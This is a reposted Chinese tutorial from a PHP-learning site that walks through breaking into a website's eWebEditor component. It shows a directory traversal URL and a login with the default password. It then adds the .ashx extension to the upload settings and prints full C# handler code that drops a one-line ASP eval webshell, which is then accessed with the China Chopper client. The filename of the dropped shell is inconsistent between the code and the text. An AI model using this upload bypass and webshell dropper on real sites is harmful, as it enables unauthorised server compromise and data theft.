来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 前言:有人已经写过了,突破上传过滤,今天我也碰到了。就当记录一下吧,正文:有个朋友要我给他检测一个站点,很久都没操作,用来练练手把。用自动扫描脚本扫描出敏感目录i...
前言:有人已经写过了,突破上传过滤,今天我也碰到了。就当记录一下吧,
正文:有个朋友要我给他检测一个站点,很久都没操作,用来练练手把。
用自动扫描脚本扫描出敏感目录
inc/ewebeditor/admin_login.asp
既然有ewebeditor编辑器那就尝试下编辑器漏洞把。
/inc/ewebeditor/admin/upload.asp?id=6&d_viewmode=list&dir=../
直接遍历来了。
使用默认密码登录ewebeditor后台,新添加样式,本想很容易解决。
上传免杀小马
加密一句话也是一样的结果。
那我们怎么解决之个问题呢-
首先在编辑器样式的上传文件添加ashx后缀
在上传我们的Ashx马。
<%@ WebHandler Language="C#" Class="Handler" %> using System; using System.Web; using System.IO; public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("a.asp"));
file1.Write("<%eval request(\"a\")%>");
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {
return false;
}
}
}
接下来访问http://www.xxx.com/UploadFile/eWebEditor/201329112155838.ashx
会在eWebEditor生成一个m.asp文件(一句话木马)
用菜刀访问http://www.2cto.com /UploadFile/eWebEditor/m.asp
就突破了
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com